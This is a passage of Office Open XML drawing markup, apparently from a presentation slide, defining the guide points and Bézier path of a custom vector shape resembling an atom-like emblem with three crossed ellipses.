                <a:gd name="connsiteY26" fmla="*/ 2311732 h 3110058"/>
                <a:gd name="connsiteX27" fmla="*/ 2530541 w 2765122"/>
                <a:gd name="connsiteY27" fmla="*/ 2244806 h 3110058"/>
                <a:gd name="connsiteX28" fmla="*/ 2289139 w 2765122"/>
                <a:gd name="connsiteY28" fmla="*/ 1700285 h 3110058"/>
                <a:gd name="connsiteX29" fmla="*/ 491768 w 2765122"/>
                <a:gd name="connsiteY29" fmla="*/ 1666932 h 3110058"/>
                <a:gd name="connsiteX30" fmla="*/ 473585 w 2765122"/>
                <a:gd name="connsiteY30" fmla="*/ 1684439 h 3110058"/>
                <a:gd name="connsiteX31" fmla="*/ 222717 w 2765122"/>
                <a:gd name="connsiteY31" fmla="*/ 2224664 h 3110058"/>
                <a:gd name="connsiteX32" fmla="*/ 719315 w 2765122"/>
                <a:gd name="connsiteY32" fmla="*/ 2300269 h 3110058"/>
                <a:gd name="connsiteX33" fmla="*/ 831176 w 2765122"/>
                <a:gd name="connsiteY33" fmla="*/ 2270901 h 3110058"/>
                <a:gd name="connsiteX34" fmla="*/ 808495 w 2765122"/>
                <a:gd name="connsiteY34" fmla="*/ 2160317 h 3110058"/>
                <a:gd name="connsiteX35" fmla="*/ 776012 w 2765122"/>
                <a:gd name="connsiteY35" fmla="*/ 1899134 h 3110058"/>
                <a:gd name="connsiteX36" fmla="*/ 679735 w 2765122"/>
                <a:gd name="connsiteY36" fmla="*/ 1826895 h 3110058"/>
                <a:gd name="connsiteX37" fmla="*/ 502637 w 2765122"/>
                <a:gd name="connsiteY37" fmla="*/ 1677612 h 3110058"/>
                <a:gd name="connsiteX38" fmla="*/ 2001099 w 2765122"/>
                <a:gd name="connsiteY38" fmla="*/ 1443878 h 3110058"/>
                <a:gd name="connsiteX39" fmla="*/ 2005588 w 2765122"/>
                <a:gd name="connsiteY39" fmla="*/ 1555029 h 3110058"/>
                <a:gd name="connsiteX40" fmla="*/ 2000712 w 2765122"/>
                <a:gd name="connsiteY40" fmla="*/ 1675767 h 3110058"/>
                <a:gd name="connsiteX41" fmla="*/ 2038461 w 2765122"/>
                <a:gd name="connsiteY41" fmla="*/ 1648469 h 3110058"/>
                <a:gd name="connsiteX42" fmla="*/ 2130505 w 2765122"/>
                <a:gd name="connsiteY42" fmla="*/ 1573751 h 3110058"/>
                <a:gd name="connsiteX43" fmla="*/ 2143759 w 2765122"/>
                <a:gd name="connsiteY43" fmla="*/ 1562074 h 3110058"/>
                <a:gd name="connsiteX44" fmla="*/ 2039991 w 2765122"/>
                <a:gd name="connsiteY44" fmla="*/ 1473050 h 3110058"/>
                <a:gd name="connsiteX45" fmla="*/ 764411 w 2765122"/>
                <a:gd name="connsiteY45" fmla="*/ 1434288 h 3110058"/>
                <a:gd name="connsiteX46" fmla="*/ 726661 w 2765122"/>
                <a:gd name="connsiteY46" fmla="*/ 1461587 h 3110058"/>
                <a:gd name="connsiteX47" fmla="*/ 634617 w 2765122"/>
                <a:gd name="connsiteY47" fmla="*/ 1536305 h 3110058"/>
                <a:gd name="connsiteX48" fmla="*/ 621360 w 2765122"/>
                <a:gd name="connsiteY48" fmla="*/ 1547985 h 3110058"/>
                <a:gd name="connsiteX49" fmla="*/ 725129 w 2765122"/>
                <a:gd name="connsiteY49" fmla="*/ 1637009 h 3110058"/>
                <a:gd name="connsiteX50" fmla="*/ 764024 w 2765122"/>
                <a:gd name="connsiteY50" fmla="*/ 1666183 h 3110058"/>
                <a:gd name="connsiteX51" fmla="*/ 759534 w 2765122"/>
                <a:gd name="connsiteY51" fmla="*/ 1555029 h 3110058"/>
                <a:gd name="connsiteX52" fmla="*/ 1386966 w 2765122"/>
                <a:gd name="connsiteY52" fmla="*/ 1049980 h 3110058"/>
                <a:gd name="connsiteX53" fmla="*/ 1160689 w 2765122"/>
                <a:gd name="connsiteY53" fmla="*/ 1170734 h 3110058"/>
                <a:gd name="connsiteX54" fmla="*/ 947211 w 2765122"/>
                <a:gd name="connsiteY54" fmla="*/ 1303680 h 3110058"/>
                <a:gd name="connsiteX55" fmla="*/ 938816 w 2765122"/>
                <a:gd name="connsiteY55" fmla="*/ 1555028 h 3110058"/>
                <a:gd name="connsiteX56" fmla="*/ 947046 w 2765122"/>
                <a:gd name="connsiteY56" fmla="*/ 1801432 h 3110058"/>
                <a:gd name="connsiteX57" fmla="*/ 1154015 w 2765122"/>
                <a:gd name="connsiteY57" fmla="*/ 1935392 h 3110058"/>
                <a:gd name="connsiteX58" fmla="*/ 1378151 w 2765122"/>
                <a:gd name="connsiteY58" fmla="*/ 2060078 h 3110058"/>
                <a:gd name="connsiteX59" fmla="*/ 1604433 w 2765122"/>
                <a:gd name="connsiteY59" fmla="*/ 1939321 h 3110058"/>
                <a:gd name="connsiteX60" fmla="*/ 1817909 w 2765122"/>
                <a:gd name="connsiteY60" fmla="*/ 1806377 h 3110058"/>
                <a:gd name="connsiteX61" fmla="*/ 1826304 w 2765122"/>
                <a:gd name="connsiteY61" fmla="*/ 1555028 h 3110058"/>
                <a:gd name="connsiteX62" fmla="*/ 1818074 w 2765122"/>
                <a:gd name="connsiteY62" fmla="*/ 1308628 h 3110058"/>
                <a:gd name="connsiteX63" fmla="*/ 1611105 w 2765122"/>
                <a:gd name="connsiteY63" fmla="*/ 1174667 h 3110058"/>
                <a:gd name="connsiteX64" fmla="*/ 1767179 w 2765122"/>
                <a:gd name="connsiteY64" fmla="*/ 890733 h 3110058"/>
                <a:gd name="connsiteX65" fmla="*/ 1629589 w 2765122"/>
                <a:gd name="connsiteY65" fmla="*/ 940281 h 3110058"/>
                <a:gd name="connsiteX66" fmla="*/ 1589093 w 2765122"/>
                <a:gd name="connsiteY66" fmla="*/ 958419 h 3110058"/>
                <a:gd name="connsiteX67" fmla="*/ 1703444 w 2765122"/>
                <a:gd name="connsiteY67" fmla="*/ 1020991 h 3110058"/>
                <a:gd name="connsiteX68" fmla="*/ 1796116 w 2765122"/>
                <a:gd name="connsiteY68" fmla="*/ 1079257 h 3110058"/>
                <a:gd name="connsiteX69" fmla="*/ 1791432 w 2765122"/>
                <a:gd name="connsiteY69" fmla="*/ 1033723 h 3110058"/>
                <a:gd name="connsiteX70" fmla="*/ 1001168 w 2765122"/>
                <a:gd name="connsiteY70" fmla="*/ 880921 h 3110058"/>
                <a:gd name="connsiteX71" fmla="*/ 973688 w 2765122"/>
                <a:gd name="connsiteY71" fmla="*/ 1033723 h 3110058"/>
                <a:gd name="connsiteX72" fmla="*/ 969233 w 2765122"/>
                <a:gd name="connsiteY72" fmla="*/ 1077033 h 3110058"/>
                <a:gd name="connsiteX73" fmla="*/ 1071048 w 2765122"/>
                <a:gd name="connsiteY73" fmla="*/ 1015472 h 3110058"/>
                <a:gd name="connsiteX74" fmla="*/ 1186470 w 2765122"/>
                <a:gd name="connsiteY74" fmla="*/ 954907 h 3110058"/>
                <a:gd name="connsiteX75" fmla="*/ 1146299 w 2765122"/>
                <a:gd name="connsiteY75" fmla="*/ 936065 h 3110058"/>
                <a:gd name="connsiteX76" fmla="*/ 2296662 w 2765122"/>
                <a:gd name="connsiteY76" fmla="*/ 783036 h 3110058"/>
                <a:gd name="connsiteX77" fmla="*/ 2045808 w 2765122"/>
                <a:gd name="connsiteY77" fmla="*/ 809787 h 3110058"/>
                <a:gd name="connsiteX78" fmla="*/ 1933945 w 2765122"/>
                <a:gd name="connsiteY78" fmla="*/ 839155 h 3110058"/>
                <a:gd name="connsiteX79" fmla="*/ 1956628 w 2765122"/>
                <a:gd name="connsiteY79" fmla="*/ 949742 h 3110058"/>
                <a:gd name="connsiteX80" fmla="*/ 1989111 w 2765122"/>
                <a:gd name="connsiteY80" fmla="*/ 1210925 h 3110058"/>
                <a:gd name="connsiteX81" fmla="*/ 2085387 w 2765122"/>
                <a:gd name="connsiteY81" fmla="*/ 1283163 h 3110058"/>
                <a:gd name="connsiteX82" fmla="*/ 2262485 w 2765122"/>
                <a:gd name="connsiteY82" fmla="*/ 1432446 h 3110058"/>
                <a:gd name="connsiteX83" fmla="*/ 2273353 w 2765122"/>
                <a:gd name="connsiteY83" fmla="*/ 1443125 h 3110058"/>
                <a:gd name="connsiteX84" fmla="*/ 2291537 w 2765122"/>
                <a:gd name="connsiteY84" fmla="*/ 1425616 h 3110058"/>
                <a:gd name="connsiteX85" fmla="*/ 2542406 w 2765122"/>
                <a:gd name="connsiteY85" fmla="*/ 885391 h 3110058"/>
                <a:gd name="connsiteX86" fmla="*/ 2296662 w 2765122"/>
                <a:gd name="connsiteY86" fmla="*/ 783036 h 3110058"/>
                <a:gd name="connsiteX87" fmla="*/ 482072 w 2765122"/>
                <a:gd name="connsiteY87" fmla="*/ 767202 h 3110058"/>
                <a:gd name="connsiteX88" fmla="*/ 234579 w 2765122"/>
                <a:gd name="connsiteY88" fmla="*/ 865253 h 3110058"/>
                <a:gd name="connsiteX89" fmla="*/ 475981 w 2765122"/>
                <a:gd name="connsiteY89" fmla="*/ 1409774 h 3110058"/>
                <a:gd name="connsiteX90" fmla="*/ 494126 w 2765122"/>
                <a:gd name="connsiteY90" fmla="*/ 1427453 h 3110058"/>
                <a:gd name="connsiteX91" fmla="*/ 571333 w 2765122"/>
                <a:gd name="connsiteY91" fmla="*/ 1360517 h 3110058"/>
                <a:gd name="connsiteX92" fmla="*/ 684587 w 2765122"/>
                <a:gd name="connsiteY92" fmla="*/ 1270938 h 3110058"/>
                <a:gd name="connsiteX93" fmla="*/ 776848 w 2765122"/>
                <a:gd name="connsiteY93" fmla="*/ 1204197 h 3110058"/>
                <a:gd name="connsiteX94" fmla="*/ 808495 w 2765122"/>
                <a:gd name="connsiteY94" fmla="*/ 949742 h 3110058"/>
                <a:gd name="connsiteX95" fmla="*/ 835139 w 2765122"/>
                <a:gd name="connsiteY95" fmla="*/ 827220 h 3110058"/>
                <a:gd name="connsiteX96" fmla="*/ 732420 w 2765122"/>
                <a:gd name="connsiteY96" fmla="*/ 798327 h 3110058"/>
                <a:gd name="connsiteX97" fmla="*/ 482072 w 2765122"/>
                <a:gd name="connsiteY97" fmla="*/ 767202 h 3110058"/>
                <a:gd name="connsiteX98" fmla="*/ 1382560 w 2765122"/>
                <a:gd name="connsiteY98" fmla="*/ 215755 h 3110058"/>
                <a:gd name="connsiteX99" fmla="*/ 1040146 w 2765122"/>
                <a:gd name="connsiteY99" fmla="*/ 703126 h 3110058"/>
                <a:gd name="connsiteX100" fmla="*/ 1038397 w 2765122"/>
                <a:gd name="connsiteY100" fmla="*/ 710184 h 3110058"/>
                <a:gd name="connsiteX101" fmla="*/ 1159394 w 2765122"/>
                <a:gd name="connsiteY101" fmla="*/ 751212 h 3110058"/>
                <a:gd name="connsiteX102" fmla="*/ 1388689 w 2765122"/>
                <a:gd name="connsiteY102" fmla="*/ 852872 h 3110058"/>
                <a:gd name="connsiteX103" fmla="*/ 1619722 w 2765122"/>
                <a:gd name="connsiteY103" fmla="*/ 755229 h 3110058"/>
                <a:gd name="connsiteX104" fmla="*/ 1729016 w 2765122"/>
                <a:gd name="connsiteY104" fmla="*/ 720284 h 3110058"/>
                <a:gd name="connsiteX105" fmla="*/ 1724974 w 2765122"/>
                <a:gd name="connsiteY105" fmla="*/ 703126 h 3110058"/>
                <a:gd name="connsiteX106" fmla="*/ 1382560 w 2765122"/>
                <a:gd name="connsiteY106" fmla="*/ 215755 h 3110058"/>
                <a:gd name="connsiteX107" fmla="*/ 1382561 w 2765122"/>
                <a:gd name="connsiteY107" fmla="*/ 0 h 3110058"/>
                <a:gd name="connsiteX108" fmla="*/ 1863319 w 2765122"/>
                <a:gd name="connsiteY108" fmla="*/ 565886 h 3110058"/>
                <a:gd name="connsiteX109" fmla="*/ 1892754 w 2765122"/>
                <a:gd name="connsiteY109" fmla="*/ 669221 h 3110058"/>
                <a:gd name="connsiteX110" fmla="*/ 1998805 w 2765122"/>
                <a:gd name="connsiteY110" fmla="*/ 644109 h 3110058"/>
                <a:gd name="connsiteX111" fmla="*/ 2729256 w 2765122"/>
                <a:gd name="connsiteY111" fmla="*/ 777515 h 3110058"/>
                <a:gd name="connsiteX112" fmla="*/ 2479563 w 2765122"/>
                <a:gd name="connsiteY112" fmla="*/ 1476806 h 3110058"/>
                <a:gd name="connsiteX113" fmla="*/ 2396868 w 2765122"/>
                <a:gd name="connsiteY113" fmla="*/ 1564493 h 3110058"/>
                <a:gd name="connsiteX114" fmla="*/ 2415853 w 2765122"/>
                <a:gd name="connsiteY114" fmla="*/ 1583149 h 3110058"/>
                <a:gd name="connsiteX115" fmla="*/ 2715481 w 2765122"/>
                <a:gd name="connsiteY115" fmla="*/ 2355928 h 3110058"/>
                <a:gd name="connsiteX116" fmla="*/ 1982813 w 2765122"/>
                <a:gd name="connsiteY116" fmla="*/ 2476565 h 3110058"/>
                <a:gd name="connsiteX117" fmla="*/ 1890625 w 2765122"/>
                <a:gd name="connsiteY117" fmla="*/ 2453030 h 3110058"/>
                <a:gd name="connsiteX118" fmla="*/ 1863319 w 2765122"/>
                <a:gd name="connsiteY118" fmla="*/ 2544172 h 3110058"/>
                <a:gd name="connsiteX119" fmla="*/ 1382561 w 2765122"/>
                <a:gd name="connsiteY119" fmla="*/ 3110058 h 3110058"/>
                <a:gd name="connsiteX120" fmla="*/ 901803 w 2765122"/>
                <a:gd name="connsiteY120" fmla="*/ 2544172 h 3110058"/>
                <a:gd name="connsiteX121" fmla="*/ 872368 w 2765122"/>
                <a:gd name="connsiteY121" fmla="*/ 2440837 h 3110058"/>
                <a:gd name="connsiteX122" fmla="*/ 766317 w 2765122"/>
                <a:gd name="connsiteY122" fmla="*/ 2465949 h 3110058"/>
                <a:gd name="connsiteX123" fmla="*/ 35866 w 2765122"/>
                <a:gd name="connsiteY123" fmla="*/ 2332544 h 3110058"/>
                <a:gd name="connsiteX124" fmla="*/ 285559 w 2765122"/>
                <a:gd name="connsiteY124" fmla="*/ 1633252 h 3110058"/>
                <a:gd name="connsiteX125" fmla="*/ 368254 w 2765122"/>
                <a:gd name="connsiteY125" fmla="*/ 1545565 h 3110058"/>
                <a:gd name="connsiteX126" fmla="*/ 349269 w 2765122"/>
                <a:gd name="connsiteY126" fmla="*/ 1526910 h 3110058"/>
                <a:gd name="connsiteX127" fmla="*/ 49641 w 2765122"/>
                <a:gd name="connsiteY127" fmla="*/ 754130 h 3110058"/>
                <a:gd name="connsiteX128" fmla="*/ 782309 w 2765122"/>
                <a:gd name="connsiteY128" fmla="*/ 633493 h 3110058"/>
                <a:gd name="connsiteX129" fmla="*/ 874497 w 2765122"/>
                <a:gd name="connsiteY129" fmla="*/ 657029 h 3110058"/>
                <a:gd name="connsiteX130" fmla="*/ 901803 w 2765122"/>
                <a:gd name="connsiteY130" fmla="*/ 565886 h 3110058"/>
                <a:gd name="connsiteX131" fmla="*/ 1382561 w 2765122"/>
                <a:gd name="connsiteY131" fmla="*/ 0 h 31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765122" h="3110058">
                  <a:moveTo>
                    <a:pt x="1376433" y="2257187"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1145400" y="2354829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1036105" y="2389775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1040146" y="2406930"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1121535" y="2704580"/>
                    <a:pt x="1244707" y="2894301"/>
                    <a:pt x="1382560" y="2894301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1520414" y="2894301"/>
                    <a:pt x="1643585" y="2704580"/>
                    <a:pt x="1724974" y="2406930"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1726723" y="2399874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1605728" y="2358846"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1795887" y="2033026"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1694075" y="2094586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1578650" y="2155153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1618821" y="2173994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1763952" y="2229138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1791432" y="2076334"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="969005" y="2030800"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="973688" y="2076334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="997942" y="2219324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1135534" y="2169774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1176026" y="2151638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1061678" y="2089068"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2270995" y="1682607"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2193789" y="1749541"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2157450" y="1779622"/>
                    <a:pt x="2119670" y="1809519"/>
                    <a:pt x="2080535" y="1839120"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1988274" y="1905861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1956628" y="2160317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1929983" y="2282840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2032699" y="2311732"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2281801" y="2367725"/>
                    <a:pt x="2467430" y="2349840"/>
                    <a:pt x="2530541" y="2244806"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2601541" y="2126643"/>
                    <a:pt x="2502356" y="1923350"/>
                    <a:pt x="2289139" y="1700285"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="491768" y="1666932"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="473585" y="1684439"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="256508" y="1903749"/>
                    <a:pt x="153790" y="2105280"/>
                    <a:pt x="222717" y="2224664"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="283985" y="2330784"/>
                    <a:pt x="469273" y="2351906"/>
                    <a:pt x="719315" y="2300269"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="831176" y="2270901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="808495" y="2160317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="776012" y="1899134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679735" y="1826895"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="616990" y="1777691"/>
                    <a:pt x="557836" y="1727770"/>
                    <a:pt x="502637" y="1677612"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2001099" y="1443878"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2005588" y="1555029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2000712" y="1675767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2038461" y="1648469"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2070345" y="1623579"/>
                    <a:pt x="2101053" y="1598643"/>
                    <a:pt x="2130505" y="1573751"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2143759" y="1562074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2039991" y="1473050"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="764411" y="1434288"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="726661" y="1461587"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="694778" y="1486477"/>
                    <a:pt x="664070" y="1511412"/>
                    <a:pt x="634617" y="1536305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="621360" y="1547985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="725129" y="1637009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="764024" y="1666183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="759534" y="1555029"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1386966" y="1049980"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1160689" y="1170734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="947211" y="1303680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="938816" y="1555028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="947046" y="1801432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1154015" y="1935392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1378151" y="2060078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1604433" y="1939321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1817909" y="1806377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1826304" y="1555028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1818074" y="1308628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1611105" y="1174667"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1767179" y="890733"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1629589" y="940281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1589093" y="958419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1703444" y="1020991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1796116" y="1079257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1791432" y="1033723"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1001168" y="880921"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="973688" y="1033723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="969233" y="1077033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071048" y="1015472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1186470" y="954907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1146299" y="936065"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2296662" y="783036"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2224233" y="781291"/>
                    <a:pt x="2139574" y="790423"/>
                    <a:pt x="2045808" y="809787"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1933945" y="839155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1956628" y="949742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1989111" y="1210925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2085387" y="1283163"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2148132" y="1332368"/>
                    <a:pt x="2207286" y="1382289"/>
                    <a:pt x="2262485" y="1432446"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2273353" y="1443125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2291537" y="1425616"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2508615" y="1206306"/>
                    <a:pt x="2611333" y="1004776"/>
                    <a:pt x="2542406" y="885391"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2504113" y="819067"/>
                    <a:pt x="2417375" y="785944"/>
                    <a:pt x="2296662" y="783036"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="482072" y="767202"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="361326" y="768003"/>
                    <a:pt x="274023" y="799606"/>
                    <a:pt x="234579" y="865253"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163579" y="983417"/>
                    <a:pt x="262764" y="1186709"/>
                    <a:pt x="475981" y="1409774"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="494126" y="1427453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="571333" y="1360517"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="607672" y="1330436"/>
                    <a:pt x="645452" y="1300540"/>
                    <a:pt x="684587" y="1270938"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="776848" y="1204197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="808495" y="949742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835139" y="827220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="732420" y="798327"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="639007" y="777329"/>
                    <a:pt x="554520" y="766721"/>
                    <a:pt x="482072" y="767202"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1382560" y="215755"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1244707" y="215755"/>
                    <a:pt x="1121535" y="405476"/>
                    <a:pt x="1040146" y="703126"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1038397" y="710184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1159394" y="751212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1388689" y="852872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1619722" y="755229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1729016" y="720284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1724974" y="703126"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1643585" y="405476"/>
                    <a:pt x="1520414" y="215755"/>
                    <a:pt x="1382560" y="215755"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1382561" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1576111" y="0"/>
                    <a:pt x="1749046" y="220285"/>
                    <a:pt x="1863319" y="565886"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1892754" y="669221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1998805" y="644109"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2355240" y="570272"/>
                    <a:pt x="2632481" y="609896"/>
                    <a:pt x="2729256" y="777515"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2826030" y="945133"/>
                    <a:pt x="2721726" y="1205043"/>
                    <a:pt x="2479563" y="1476806"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2396868" y="1564493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2415853" y="1583149"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2697403" y="1884053"/>
                    <a:pt x="2823474" y="2176199"/>
                    <a:pt x="2715481" y="2355928"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2615796" y="2521833"/>
                    <a:pt x="2337906" y="2556612"/>
                    <a:pt x="1982813" y="2476565"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1890625" y="2453030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1863319" y="2544172"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1749047" y="2889773"/>
                    <a:pt x="1576111" y="3110058"/>
                    <a:pt x="1382561" y="3110058"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1189012" y="3110058"/>
                    <a:pt x="1016076" y="2889773"/>
                    <a:pt x="901803" y="2544172"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="872368" y="2440837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="766317" y="2465949"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="409882" y="2539787"/>
                    <a:pt x="132641" y="2500163"/>
                    <a:pt x="35866" y="2332544"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-60908" y="2164925"/>
                    <a:pt x="43396" y="1905015"/>
                    <a:pt x="285559" y="1633252"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="368254" y="1545565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="349269" y="1526910"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="67719" y="1226005"/>
                    <a:pt x="-58351" y="933860"/>
                    <a:pt x="49641" y="754130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="149326" y="588226"/>
                    <a:pt x="427216" y="553446"/>
                    <a:pt x="782309" y="633493"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="874497" y="657029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="901803" y="565886"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1016076" y="220285"/>
                    <a:pt x="1189012" y="0"/>
                    <a:pt x="13825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9C9A370C-239C-46DD-B40B-9E055DB25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6004" y="3682990"/>
              <a:ext cx="320490" cy="269438"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
